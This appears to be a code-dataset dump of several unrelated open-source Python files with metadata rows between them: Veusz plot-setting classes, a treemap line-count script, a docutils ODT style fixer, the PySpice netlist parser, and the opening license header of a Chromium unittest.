'forward diagonals', 'backward diagonals',
'diagonal cross',
'94% dense', '88% dense', '63% dense', '50% dense',
'37% dense', '12% dense', '6% dense' ]
_fillcnvt = { 'solid': qt4.Qt.SolidPattern,
'horizontal': qt4.Qt.HorPattern,
'vertical': qt4.Qt.VerPattern,
'cross': qt4.Qt.CrossPattern,
'forward diagonals': qt4.Qt.FDiagPattern,
'backward diagonals': qt4.Qt.BDiagPattern,
'diagonal cross': qt4.Qt.DiagCrossPattern,
'94% dense': qt4.Qt.Dense1Pattern,
'88% dense': qt4.Qt.Dense2Pattern,
'63% dense': qt4.Qt.Dense3Pattern,
'50% dense': qt4.Qt.Dense4Pattern,
'37% dense': qt4.Qt.Dense5Pattern,
'12% dense': qt4.Qt.Dense6Pattern,
'6% dense': qt4.Qt.Dense7Pattern }
controls.FillStyle._fills = _fillstyles
controls.FillStyle._fillcnvt = _fillcnvt
def __init__(self, name, value, **args):
Choice.__init__(self, name, self._fillstyles, value, **args)
def copy(self):
"""Make a copy of the setting."""
return self._copyHelper((), (), {})
def qtStyle(self):
"""Return Qt ID of fill."""
return self._fillcnvt[self.val]
def makeControl(self, *args):
return controls.FillStyle(self, *args)
class LineStyle(Choice):
"""A setting choosing a particular line style."""
typename = 'line-style'
# list of allowed line styles
_linestyles = ['solid', 'dashed', 'dotted',
'dash-dot', 'dash-dot-dot', 'dotted-fine',
'dashed-fine', 'dash-dot-fine',
'dot1', 'dot2', 'dot3', 'dot4',
'dash1', 'dash2', 'dash3', 'dash4', 'dash5',
'dashdot1', 'dashdot2', 'dashdot3']
# convert from line styles to Qt constants and a custom pattern (if any)
_linecnvt = { 'solid': (qt4.Qt.SolidLine, None),
'dashed': (qt4.Qt.DashLine, None),
'dotted': (qt4.Qt.DotLine, None),
'dash-dot': (qt4.Qt.DashDotLine, None),
'dash-dot-dot': (qt4.Qt.DashDotDotLine, None),
'dotted-fine': (qt4.Qt.CustomDashLine, [2, 4]),
'dashed-fine': (qt4.Qt.CustomDashLine, [8, 4]),
'dash-dot-fine': (qt4.Qt.CustomDashLine, [8, 4, 2, 4]),
'dot1': (qt4.Qt.CustomDashLine, [0.1, 2]),
'dot2': (qt4.Qt.CustomDashLine, [0.1, 4]),
'dot3': (qt4.Qt.CustomDashLine, [0.1, 6]),
'dot4': (qt4.Qt.CustomDashLine, [0.1, 8]),
'dash1': (qt4.Qt.CustomDashLine, [4, 4]),
'dash2': (qt4.Qt.CustomDashLine, [4, 8]),
'dash3': (qt4.Qt.CustomDashLine, [8, 8]),
'dash4': (qt4.Qt.CustomDashLine, [16, 8]),
'dash5': (qt4.Qt.CustomDashLine, [16, 16]),
'dashdot1': (qt4.Qt.CustomDashLine, [0.1, 4, 4, 4]),
'dashdot2': (qt4.Qt.CustomDashLine, [0.1, 4, 8, 4]),
'dashdot3': (qt4.Qt.CustomDashLine, [0.1, 2, 4, 2]),
}
controls.LineStyle._lines = _linestyles
def __init__(self, name, default, **args):
Choice.__init__(self, name, self._linestyles, default, **args)
def copy(self):
"""Make a copy of the setting."""
return self._copyHelper((), (), {})
def qtStyle(self):
"""Get Qt ID of chosen line style."""
return self._linecnvt[self.val]
def makeControl(self, *args):
return controls.LineStyle(self, *args)
class Axis(Str):
"""A setting to hold the name of an axis.
direction is 'horizontal', 'vertical' or 'both'
"""
typename = 'axis'
def __init__(self, name, val, direction, **args):
"""Initialise using the document, so we can get the axes later.
direction is horizontal or vertical to specify the type of axis to
show
"""
Setting.__init__(self, name, val, **args)
self.direction = direction
def copy(self):
"""Make a copy of the setting."""
return self._copyHelper((), (self.direction,), {})
def makeControl(self, *args):
"""Allows user to choose an axis or enter a name."""
return controls.Axis(self, self.getDocument(), self.direction, *args)
class WidgetChoice(Str):
"""Hold the name of a child widget."""
typename = 'widget-choice'
def __init__(self, name, val, widgettypes={}, **args):
"""Choose widgets from (named) type given."""
Setting.__init__(self, name, val, **args)
self.widgettypes = widgettypes
def copy(self):
"""Make a copy of the setting."""
return self._copyHelper((), (),
{'widgettypes': self.widgettypes})
def buildWidgetList(self, level, widget, outdict):
"""A recursive helper to build up a list of possible widgets.
This iterates over widget's children, and adds widgets as tuples
to outdict using outdict[name] = (widget, level)
Lower level images of the same name outweigh other images further down
the tree
"""
for child in widget.children:
if child.typename in self.widgettypes:
if (child.name not in outdict) or (outdict[child.name][1]>level):
outdict[child.name] = (child, level)
else:
self.buildWidgetList(level+1, child, outdict)
def getWidgetList(self):
"""Return a dict of valid widget names and the corresponding objects."""
# find widget which contains setting
widget = self.parent
while not widget.iswidget and widget is not None:
widget = widget.parent
# get widget's parent
if widget is not None:
widget = widget.parent
# get list of widgets from recursive find
widgets = {}
if widget is not None:
self.buildWidgetList(0, widget, widgets)
# turn (object, level) pairs into object
outdict = {}
for name, val in widgets.items():
outdict[name] = val[0]
return outdict
def findWidget(self):
"""Find the image corresponding to this setting.
Returns Image object if succeeds or None if fails
"""
widgets = self.getWidgetList()
try:
return widgets[self.get()]
except KeyError:
return None
def makeControl(self, *args):
"""Allows user to choose an image widget or enter a name."""
return controls.WidgetChoice(self, self.getDocument(), *args)
class Marker(Choice):
"""Choose a marker type from one allowable."""
typename = 'marker'
def __init__(self, name, value, **args):
Choice.__init__(self, name, utils.MarkerCodes, value, **args)
def copy(self):
"""Make a copy of the setting."""
return self._copyHelper((), (), {})
def makeControl(self, *args):
return controls.Marker(self, *args)
class Arrow(Choice):
"""Choose an arrow type from one allowable."""
typename = 'arrow'
def __init__(self, name, value, **args):
Choice.__init__(self, name, utils.ArrowCodes, value, **args)
def copy(self):
"""Make a copy of the setting."""
return self._copyHelper((), (), {})
def makeControl(self, *args):
return controls.Arrow(self, *args)
class LineSet(Setting):
"""A setting which corresponds to a set of lines.
"""
typename='line-multi'
def normalize(self, val):
"""Takes a tuple/list of tuples:
[('dotted', '1pt', 'color', <trans>, False), ...]
These are style, width, color, and hide or
style, widget, color, transparency, hide
"""
if type(val) not in (list, tuple):
raise utils.InvalidType
# check each entry in the list is appropriate
for line in val:
try:
style, width, color, hide = line
except ValueError:
raise utils.InvalidType
if ( not isinstance(color, cbasestr) or
not Distance.isDist(width) or
style not in LineStyle._linestyles or
type(hide) not in (int, bool) ):
raise utils.InvalidType
return val
def makeControl(self, *args):
"""Make specialised lineset control."""
return controls.LineSet(self, *args)
def makePen(self, painter, row):
"""Make a pen for the painter using row.
If row is outside of range, then cycle
"""
if len(self.val) == 0:
return qt4.QPen(qt4.Qt.NoPen)
else:
row = row % len(self.val)
v = self.val[row]
style, width, color, hide = v
width = Distance.convertDistance(painter, width)
style, dashpattern = LineStyle._linecnvt[style]
col = painter.docColor(color)
pen = qt4.QPen(col, width, style)
if dashpattern:
pen.setDashPattern(dashpattern)
if hide:
pen.setStyle(qt4.Qt.NoPen)
return pen
class FillSet(Setting):
"""A setting which corresponds to a set of fills.
This setting keeps an internal array of LineSettings.
"""
typename = 'fill-multi'
def normalize(self, val):
"""Takes a tuple/list of tuples:
[('solid', 'color', False), ...]
These are color, fill style, and hide or
color, fill style, and hide
(style, color, hide,
[optional transparency, linewidth,
linestyle, spacing, backcolor, backtrans, backhide]])
"""
if type(val) not in (list, tuple):
raise utils.InvalidType
# check each entry in the list is appropriate
for fill in val:
try:
style, color, hide = fill[:3]
except ValueError:
raise utils.InvalidType
if ( not isinstance(color, cbasestr) or
style not in utils.extfillstyles or
type(hide) not in (int, bool) or
len(fill) not in (3, 10) ):
raise utils.InvalidType
return val
def makeControl(self, *args):
"""Make specialised lineset control."""
return controls.FillSet(self, *args)
def returnBrushExtended(self, row):
"""Return BrushExtended for the row."""
from . import collections
s = collections.BrushExtended('tempbrush')
s.parent = self
if len(self.val) == 0:
s.hide = True
else:
v = self.val[row % len(self.val)]
s.style = v[0]
s.color = v[1]
s.hide = v[2]
if len(v) == 10:
(s.transparency, s.linewidth, s.linestyle,
s.patternspacing, s.backcolor,
s.backtransparency, s.backhide) = v[3:]
return s
class Filename(Str):
"""Represents a filename setting."""
typename = 'filename'
def makeControl(self, *args):
return controls.Filename(self, 'file', *args)
def normalize(self, val):
if sys.platform == 'win32':
val = val.replace('\\', '/')
return val
class ImageFilename(Filename):
"""Represents an image filename setting."""
typename = 'filename-image'
def makeControl(self, *args):
return controls.Filename(self, 'image', *args)
class FontFamily(Str):
"""Represents a font family."""
typename = 'font-family'
def makeControl(self, *args):
"""Make a special font combobox."""
return controls.FontFamily(self, *args)
class ErrorStyle(Choice):
"""Error bar style.
The allowed values are below in _errorstyles.
"""
typename = 'errorbar-style'
_errorstyles = (
'none',
'bar', 'barends', 'box', 'diamond', 'curve',
'barbox', 'bardiamond', 'barcurve',
'boxfill', 'diamondfill', 'curvefill',
'fillvert', 'fillhorz',
'linevert', 'linehorz',
'linevertbar', 'linehorzbar'
)
controls.ErrorStyle._errorstyles = _errorstyles
def __init__(self, name, value, **args):
Choice.__init__(self, name, self._errorstyles, value, **args)
def copy(self):
"""Make a copy of the setting."""
return self._copyHelper((), (), {})
def makeControl(self, *args):
return controls.ErrorStyle(self, *args)
class AlignHorz(Choice):
"""Alignment horizontally."""
typename = 'align-horz'
def __init__(self, name, value, **args):
Choice.__init__(self, name, ['left', 'centre', 'right'], value, **args)
def copy(self):
"""Make a copy of the setting."""
return self._copyHelper((), (), {})
class AlignVert(Choice):
"""Alignment vertically."""
typename = 'align-vert'
def __init__(self, name, value, **args):
Choice.__init__(self, name, ['top', 'centre', 'bottom'], value, **args)
def copy(self):
"""Make a copy of the setting."""
return self._copyHelper((), (), {})
class AlignHorzWManual(Choice):
"""Alignment horizontally."""
typename = 'align-horz-+manual'
def __init__(self, name, value, **args):
Choice.__init__(self, name, ['left', 'centre', 'right', 'manual'],
value, **args)
def copy(self):
"""Make a copy of the setting."""
return self._copyHelper((), (), {})
class AlignVertWManual(Choice):
"""Alignment vertically."""
typename = 'align-vert-+manual'
def __init__(self, name, value, **args):
Choice.__init__(self, name, ['top', 'centre', 'bottom', 'manual'],
value, **args)
def copy(self):
"""Make a copy of the setting."""
return self._copyHelper((), (), {})
# Bool which shows/hides other settings
class BoolSwitch(Bool):
"""Bool switching setting."""
def __init__(self, name, value, settingsfalse=[], settingstrue=[],
**args):
"""Enables/disables a set of settings if True or False
settingsfalse and settingstrue are lists of names of settings
which are hidden/shown to user
"""
self.sfalse = settingsfalse
self.strue = settingstrue
Bool.__init__(self, name, value, **args)
def makeControl(self, *args):
return controls.BoolSwitch(self, *args)
def copy(self):
return self._copyHelper((), (), {'settingsfalse': self.sfalse,
'settingstrue': self.strue})
class ChoiceSwitch(Choice):
"""Show or hide other settings based on the choice given here."""
def __init__(self, name, vallist, value, settingstrue=[], settingsfalse=[],
showfn=lambda val: True, **args):
"""Enables/disables a set of settings if True or False
settingsfalse and settingstrue are lists of names of settings
which are hidden/shown to user depending on showfn(val)."""
self.sfalse = settingsfalse
self.strue = settingstrue
self.showfn = showfn
Choice.__init__(self, name, vallist, value, **args)
def makeControl(self, *args):
return controls.ChoiceSwitch(self, False, self.vallist, *args)
def copy(self):
return self._copyHelper((self.vallist,), (),
{'settingsfalse': self.sfalse,
'settingstrue': self.strue,
'showfn': self.showfn})
class FillStyleExtended(ChoiceSwitch):
"""A setting for the different fill styles provided by Qt."""
typename = 'fill-style-ext'
_strue = ( 'linewidth', 'linestyle', 'patternspacing',
'backcolor', 'backtransparency', 'backhide' )
@staticmethod
def _ishatch(val):
"""Is this a hatching fill?"""
return not ( val == 'solid' or val.find('dense') >= 0 )
def __init__(self, name, value, **args):
ChoiceSwitch.__init__(self, name, utils.extfillstyles, value,
settingstrue=self._strue, settingsfalse=(),
showfn=self._ishatch,
**args)
def copy(self):
"""Make a copy of the setting."""
return self._copyHelper((), (), {})
def makeControl(self, *args):
return controls.FillStyleExtended(self, *args)
class RotateInterval(Choice):
'''Rotate a label with intervals given.'''
def __init__(self, name, val, **args):
Choice.__init__(self, name,
('-180', '-135', '-90', '-45',
'0', '45', '90', '135', '180'),
val, **args)
def normalize(self, val):
"""Store rotate angle."""
# backward compatibility with rotate option
# False: angle 0
# True: angle 90
if val == False:
val = '0'
elif val == True:
val = '90'
return Choice.normalize(self, val)
def copy(self):
"""Make a copy of the setting."""
return self._copyHelper((), (), {})
class Colormap(Str):
"""A setting to set the color map used in an image.
This is based on a Str rather than Choice as the list might
change later.
"""
def makeControl(self, *args):
return controls.Colormap(self, self.getDocument(), *args)
class AxisBound(FloatOrAuto):
"""Axis bound - either numeric, Auto or date."""
typename = 'axis-bound'
def makeControl(self, *args):
return controls.AxisBound(self, *args)
def toUIText(self):
"""Convert to text, taking into account mode of Axis.
Displays datetimes in date format if used
"""
try:
mode = self.parent.mode
except AttributeError:
mode = None
v = self.val
if ( not isinstance(v, cbasestr) and v is not None and
mode == 'datetime' ):
return utils.dateFloatToString(v)
return FloatOrAuto.toUIText(self)
def fromUIText(self, txt):
"""Convert from text, allowing datetimes."""
v = utils.dateStringToDate(txt)
if N.isfinite(v):
return v
else:
return FloatOrAuto.fromUIText(self, txt)
|
gpl-2.0
| 3,422,023,577,333,544,000
| 29.448004
| 81
| 0.560709
| false
| 4.152496
| false
| false
| false
|
johntellsall/shotglass
|
ex-treemap/tree.py
|
1
|
1087
|
import os
import sys
import matplotlib
matplotlib.use('svg')
import matplotlib.pyplot as plt
import pandas as pd
import squarify
DULL_DIRECTORIES = set(['.git'])
def count_lines(path):
return sum(1 for line in open(path))
# TODO make configurable
def walk_tree(topdir):
for root, dirs, files in os.walk(topdir):
dirs[:] = list(set(dirs) - DULL_DIRECTORIES)
for file in files:
yield os.path.join(root, file)
# TODO make configurable
def is_source(path):
return os.path.splitext(path)[-1] == '.py'
project_dir = sys.argv[1]
source_paths = list(filter(is_source, walk_tree(project_dir)))
line_counts = list(map(count_lines, source_paths))
names = list(map(os.path.basename, source_paths))
print(names)
df = pd.DataFrame({
'paths': source_paths,
'names': names})
df['line_counts'] = line_counts
# TODO zap items where line_count==0
print(line_counts)
squarify.plot(
sizes=df['line_counts'],
label=df['names'], alpha=.8)
plt.axis('off')
title = os.path.basename(project_dir).title()
plt.title(title)
plt.savefig('tree.png')
|
mit
| 9,175,307,799,650,051,000
| 21.183673
| 62
| 0.681693
| false
| 3.07932
| false
| false
| false
|
KungFuLucky7/stock_portfolios_server
|
venv/bin/rst2odt_prepstyles.py
|
1
|
1738
|
#!/Users/terrywong/stock_portfolios_server/venv/bin/python
# $Id: rst2odt_prepstyles.py 5839 2009-01-07 19:09:28Z dkuhlman $
# Author: Dave Kuhlman <dkuhlman@rexx.com>
# Copyright: This module has been placed in the public domain.
"""
Fix a word-processor-generated styles.odt for odtwriter use: Drop page size
specifications from styles.xml in STYLE_FILE.odt.
"""
#
# Author: Michael Schutte <michi@uiae.at>
from lxml import etree
import sys
import zipfile
from tempfile import mkstemp
import shutil
import os
NAMESPACES = {
"style": "urn:oasis:names:tc:opendocument:xmlns:style:1.0",
"fo": "urn:oasis:names:tc:opendocument:xmlns:xsl-fo-compatible:1.0"
}
def prepstyle(filename):
zin = zipfile.ZipFile(filename)
styles = zin.read("styles.xml")
root = etree.fromstring(styles)
for el in root.xpath("//style:page-layout-properties",
namespaces=NAMESPACES):
for attr in el.attrib:
if attr.startswith("{%s}" % NAMESPACES["fo"]):
del el.attrib[attr]
tempname = mkstemp()
zout = zipfile.ZipFile(os.fdopen(tempname[0], "w"), "w",
zipfile.ZIP_DEFLATED)
for item in zin.infolist():
if item.filename == "styles.xml":
zout.writestr(item, etree.tostring(root))
else:
zout.writestr(item, zin.read(item.filename))
zout.close()
zin.close()
shutil.move(tempname[1], filename)
def main():
args = sys.argv[1:]
if len(args) != 1:
print >> sys.stderr, __doc__
print >> sys.stderr, "Usage: %s STYLE_FILE.odt\n" % sys.argv[0]
sys.exit(1)
filename = args[0]
prepstyle(filename)
if __name__ == '__main__':
main()
# vim:tw=78:sw=4:sts=4:et:
|
gpl-2.0
| 5,343,714,636,521,661,000
| 24.940299
| 75
| 0.632911
| false
| 3.033159
| false
| false
| false
|
thomaslima/PySpice
|
PySpice/Spice/Parser.py
|
1
|
23694
|
####################################################################################################
#
# PySpice - A Spice Package for Python
# Copyright (C) 2014 Fabrice Salvaire
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
####################################################################################################
####################################################################################################
"""This module implements a partial SPICE netlist parser.
It would be difficult to implement a full parser for Ngspice since the syntax is mainly contextual.
"""
####################################################################################################
import logging
####################################################################################################
from .ElementParameter import (
FlagParameter,
)
from .Netlist import ElementParameterMetaClass, NPinElement, Circuit
from .BasicElement import SubCircuitElement, BipolarJunctionTransistor
####################################################################################################
_module_logger = logging.getLogger(__name__)
####################################################################################################
class PrefixData:
##############################################
def __init__(self, prefix, classes):
self.prefix = prefix
self.classes = classes
number_of_positionals_min = 1000
number_of_positionals_max = 0
has_optionals = False
for element_class in classes:
number_of_positionals = element_class.number_of_positional_parameters
number_of_positionals_min = min(number_of_positionals_min, number_of_positionals)
number_of_positionals_max = max(number_of_positionals_max, number_of_positionals)
has_optionals = max(has_optionals, bool(element_class.optional_parameters))
self.number_of_positionals_min = number_of_positionals_min
self.number_of_positionals_max = number_of_positionals_max
self.has_optionals = has_optionals
self.multi_devices = len(classes) > 1
self.npins = prefix in ('Q', 'X') # NPinElement, Q has 3 to 4 pins
if self.npins:
self.number_of_pins = None
else:
# Q and X are single
self.number_of_pins = classes[0].number_of_pins
self.has_flag = False
for element_class in classes:
for parameter in element_class.optional_parameters.values():
if isinstance(parameter, FlagParameter):
self.has_flag = True
##############################################
def __len__(self):
return len(self.classes)
##############################################
def __iter__(self):
return iter(self.classes)
##############################################
@property
def single(self):
if not self.multi_devices:
return self.classes[0]
else:
raise NameError()
####################################################################################################
_prefix_cache = {prefix:PrefixData(prefix, classes)
for prefix, classes in ElementParameterMetaClass.__classes__.items()}
# for prefix_data in sorted(_prefix_cache.values(), key=lambda x: len(x)):
# print(prefix_data.prefix,
# len(prefix_data),
# prefix_data.number_of_positionals_min, prefix_data.number_of_positionals_max,
# prefix_data.has_optionals)
# Single:
# B 0 True
# D 1 True
# F 2 False
# G 1 False
# H 2 False
# I 1 False
# J 1 True
# K 3 False
# M 1 True
# S 2 False
# V 1 False
# W 3 False
# Z 1 True
# Two:
# E 0 1 False
# L 1 2 True
# Three:
# C 1 2 True
# R 1 2 True
# NPinElement:
# Q 1 1 True
# X 1 1 False
####################################################################################################
class Token:
""" This class implements a token, in fact a line in a Spice netlist. """
##############################################
def __init__(self, line):
self._line = line
##############################################
def __repr__(self):
return "{} {}".format(self.__class__.__name__, repr(self._line))
####################################################################################################
class Comment(Token):
pass
####################################################################################################
class Title(Token):
""" This class implements a title definition. """
##############################################
def __init__(self, line):
super().__init__(line)
self._title = self._line.read_right_of('.title')
##############################################
def __str__(self):
return self._title
##############################################
def __repr__(self):
return "Title {}".format(self._title)
####################################################################################################
class Include(Token):
""" This class implements a include definition. """
##############################################
def __init__(self, line):
super().__init__(line)
self._include = self._line.read_right_of('.include')
##############################################
def __str__(self):
return self._include
##############################################
def __repr__(self):
return "Include {}".format(self._title)
####################################################################################################
class Model(Token):
""" This class implements a model definition.
Spice syntax::
.model mname type (pname1=pval1 pname2=pval2)
"""
##############################################
def __init__(self, line):
super().__init__(line)
# Fixme
parameters, dict_parameters = self._line.split_line('.model')
self._name, self._model_type = parameters[:2]
self._parameters = dict_parameters
##############################################
@property
def name(self):
""" Name of the model """
return self._name
##############################################
def __repr__(self):
return "Model {} {} {}".format(self._name, self._model_type, self._parameters)
####################################################################################################
class SubCircuit(Token):
""" This class implements a sub-circuit definition.
Spice syntax::
.SUBCKT name node1 ... param1=value1 ...
"""
##############################################
def __init__(self, line):
super().__init__(line)
# Fixme:
parameters, dict_parameters = self._line.split_line('.subckt')
self._name, self._nodes = parameters[0], parameters[1:]
self._tokens = []
##############################################
@property
def name(self):
""" Name of the sub-circuit. """
return self._name
##############################################
def __repr__(self):
text = "SubCircuit {} {}\n".format(self._name, self._nodes)
text += '\n'.join([' ' + repr(token) for token in self._tokens])
return text
##############################################
def __iter__(self):
""" Return an iterator on the tokens. """
return iter(self._tokens)
##############################################
def append(self, token):
""" Append a token to the token's list. """
self._tokens .append(token)
####################################################################################################
class Element(Token):
""" This class implements an element definition.
"{ expression }" are allowed in device line.
"""
_logger = _module_logger.getChild('Element')
##############################################
def __init__(self, line):
super().__init__(line)
line_str = str(line)
# self._logger.debug('\n' + line_str)
# Retrieve device prefix
self._prefix = line_str[0]
prefix_data = _prefix_cache[self._prefix]
# Retrieve device name
start_location = 1
stop_location = line_str.find(' ')
# Fixme: if stop_location == -1:
self._name = line_str[start_location:stop_location]
self._nodes = []
self._parameters = []
self._dict_parameters = {}
# Read nodes
if not prefix_data.npins:
number_of_pins = prefix_data.number_of_pins
if number_of_pins:
self._nodes, stop_location = self._line.read_words(stop_location, number_of_pins)
else: # Q or X
if prefix_data.prefix == 'Q':
self._nodes, stop_location = self._line.read_words(stop_location, 3)
# Fixme: optional node
else: # X
args, stop_location = self._line.split_words(stop_location, until='=')
self._nodes = args[:-1]
self._parameters.append(args[-1]) # model name
# Read positionals
number_of_positionals = prefix_data.number_of_positionals_min
if number_of_positionals and stop_location is not None: # model is optional
self._parameters, stop_location = self._line.read_words(stop_location, number_of_positionals)
if prefix_data.multi_devices and stop_location is not None:
remaining, stop_location = self._line.split_words(stop_location, until='=')
self._parameters.extend(remaining)
if prefix_data.prefix in ('V', 'I') and stop_location is not None:
# merge remaining
self._parameters[-1] += line_str[stop_location:]
# Read optionals
if prefix_data.has_optionals and stop_location is not None:
kwargs, stop_location = self._line.split_words(stop_location)
for kwarg in kwargs:
try:
key, value = kwarg.split('=')
self._dict_parameters[key] = value
except ValueError:
if kwarg in ('off',) and prefix_data.has_flag:
self._dict_parameters['off'] = True
else:
self._logger.warn(line_str)
# raise NameError("Bad element line:", line_str)
if prefix_data.multi_devices:
for element_class in prefix_data:
if len(self._parameters) == element_class.number_of_positional_parameters:
break
else:
element_class = prefix_data.single
self.factory = element_class
# Move positionals passed as kwarg
to_delete = []
for parameter in element_class.positional_parameters.values():
if parameter.key_parameter:
i = parameter.position
self._dict_parameters[parameter.attribute_name] = self._parameters[i]
to_delete.append(i)
for i in to_delete:
del self._parameters[i]
self._logger.debug('\n' + self.__repr__())
##############################################
@property
def name(self):
""" Name of the element """
return self._name
##############################################
def __repr__(self):
return "Element {0._prefix} {0._name} {0._nodes} {0._parameters} {0._dict_parameters}".format(self)
####################################################################################################
class Line:
""" This class implements a line in the netlist. """
##############################################
def __init__(self, text, line_range):
text = str(text)
for marker in ('$', ';', '//'):
location = text.find(marker)
if location != -1:
break
if location != -1:
text = text[:location]
comment = text[location:]
else:
comment = ''
self._text = text
self._comment = comment
self._line_range = line_range
##############################################
def __repr__(self):
return "{0._line_range} {0._text}".format(self)
##############################################
def __str__(self):
return self._text
##############################################
def read_right_of(self, text):
return self._text[len(text):].strip()
##############################################
def read_words(self, start_location, number_of_words):
line_str = self._text
number_of_words_read = 0
words = []
while number_of_words_read < number_of_words: # and start_location < len(line_str)
stop_location = line_str.find(' ', start_location)
if stop_location == -1:
stop_location = None # read until end
word = line_str[start_location:stop_location].strip()
if word:
number_of_words_read += 1
words.append(word)
if stop_location is None: # we should stop
if number_of_words_read != number_of_words:
template = "Bad element line, looking for word {}/{}:\n"
raise NameError(template.format(number_of_words_read, number_of_words) +
line_str + '\n' +
' '*start_location + '^')
else:
if start_location < stop_location:
start_location = stop_location
else: # we have read a space
start_location += 1
return words, stop_location
##############################################
def split_words(self, start_location, until=None):
line_str = self._text
stop_location = None
if until is not None:
location = line_str.find(until, start_location)
if location != -1:
stop_location = location
location = line_str.rfind(' ', start_location, stop_location)
if location != -1:
stop_location = location
else:
raise NameError("Bad element line, missing key? " + line_str)
line_str = line_str[start_location:stop_location]
words = [x for x in line_str.split(' ') if x]
return words, stop_location
##############################################
def split_line(self, keyword):
""" Split the line according to the following pattern::
keyword parameter1 parameter2 ... key1=value1 key2=value2 ...
Return the list of parameters and the dictionnary.
"""
raw_parameters = self._text[len(keyword):].split()
parameters = []
dict_parameters = {}
for parameter in raw_parameters:
if '=' in parameter:
key, value = parameter.split('=')
dict_parameters[key.strip()] = value.strip()
else:
parameters.append(parameter)
return parameters, dict_parameters
####################################################################################################
class SpiceParser:
""" This class parse a Spice netlist file and build a syntax tree.
Public Attributes:
:attr:`circuit`
:attr:`models`
:attr:`subcircuits`
"""
_logger = _module_logger.getChild('SpiceParser')
##############################################
def __init__(self, path=None, source=None):
# Fixme: empty source
if path is not None:
with open(str(path), 'r') as f:
raw_lines = f.readlines()
elif source is not None:
raw_lines = source.split('\n') # Fixme: other os
else:
raise ValueError
lines = self._merge_lines(raw_lines)
self._title = None
self._tokens = self._parse(lines)
self._find_sections()
##############################################
def _merge_lines(self, raw_lines):
"""Merge broken lines and return a new list of lines.
A line starting with "+" continues the preceding line.
"""
# Fixme: better using lines[-1] ?
lines = []
current_line = ''
current_line_index = None
for line_index, line in enumerate(raw_lines):
if line.startswith('+'):
current_line += ' ' + line[1:].strip()
else:
if current_line:
lines.append(Line(current_line, slice(current_line_index, line_index)))
current_line = line.strip()
current_line_index = line_index
if current_line:
lines.append(Line(current_line, slice(current_line_index, len(raw_lines))))
return lines
##############################################
def _parse(self, lines):
""" Parse the lines and return a list of tokens. """
tokens = []
sub_circuit = None
scope = tokens
for line in lines:
# print repr(line)
text = str(line)
lower_case_text = text.lower() # !
if text.startswith('*'):
scope.append(Comment(line))
elif lower_case_text.startswith('.'):
lower_case_text = lower_case_text[1:]
if lower_case_text.startswith('subckt'):
sub_circuit = SubCircuit(line)
tokens.append(sub_circuit)
scope = sub_circuit
elif lower_case_text.startswith('ends'):
sub_circuit = None
scope = tokens
elif lower_case_text.startswith('title'):
self._title = Title(line)
scope.append(self._title)
elif lower_case_text.startswith('end'):
pass
elif lower_case_text.startswith('model'):
model = Model(line)
scope.append(model)
elif lower_case_text.startswith('include'):
scope.append(Include(line))
else:
# options param ...
# .global
# .lib filename libname
# .param
# .func .csparam .temp .if
# { expr } are allowed in .model lines and in device lines.
self._logger.warn(line)
else:
element = Element(line)
scope.append(element)
return tokens
##############################################
def _find_sections(self):
""" Look for model, sub-circuit and circuit definitions in the token list. """
self.circuit = None
self.subcircuits = []
self.models = []
for token in self._tokens:
if isinstance(token, Title):
if self.circuit is None:
self.circuit = token
else:
raise NameError("More than one title")
elif isinstance(token, SubCircuit):
self.subcircuits.append(token)
elif isinstance(token, Model):
self.models.append(token)
##############################################
def is_only_subcircuit(self):
return bool(not self.circuit and self.subcircuits)
##############################################
def is_only_model(self):
return bool(not self.circuit and not self.subcircuits and self.models)
##############################################
def build_circuit(self, ground=0):
ground = str(ground)
circuit = Circuit(str(self._title))
for token in self._tokens:
if isinstance(token, Include):
circuit.include(str(token))
for token in self._tokens:
if isinstance(token, Element):
factory = getattr(circuit, token.factory.alias)
nodes = []
for node in token._nodes:
if str(node) == ground:
node = 0
nodes.append(node)
if token._prefix != 'X':
args = nodes + token._parameters
else: # != Spice
args = token._parameters + nodes
kwargs = token._dict_parameters
message = ' '.join([str(x) for x in (token._prefix, token._name, nodes,
token._parameters, token._dict_parameters)])
self._logger.debug(message)
factory(token._name, *args, **kwargs)
return circuit
##############################################
def _to_python(self, value):
try:
int_value = int(value)
value = float(value)
if int_value == value:
return str(int_value)
else:
return str(value)
except ValueError:
return "'{}'".format(value)
##############################################
def to_python_code(self, ground=0):
ground = str(ground)
# for token in self._tokens:
# if isinstance(token, Include):
# circuit.include(str(token))
if self._title:
title = self._title
else:
title = '...'
circuit = "circuit = Circuit('{}')\n".format(title)
for token in self._tokens:
if isinstance(token, Element):
nodes = []
for node in token._nodes:
if str(node) == ground:
node = 0
nodes.append(node)
if token._prefix != 'X':
args = nodes + token._parameters
else: # != Spice
args = token._parameters + nodes
args = [self._to_python(x) for x in args]
kwargs = ['{}={}'.format(key, self._to_python(value))
for key, value in token._dict_parameters.items()]
parameters = ', '.join(args + kwargs)
circuit += "circuit.{}({})\n".format(token._prefix, parameters)
return circuit
####################################################################################################
#
# End
#
####################################################################################################
|
gpl-3.0
| -8,791,368,678,577,161,000
| 30.676471
| 107
| 0.447666
| false
| 4.901531
| false
| false
| false
|
chromium/chromium
|
third_party/blink/tools/blinkpy/common/system/platform_info_unittest.py
|
7
|
11345
|
# Copyright (C) 2011 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
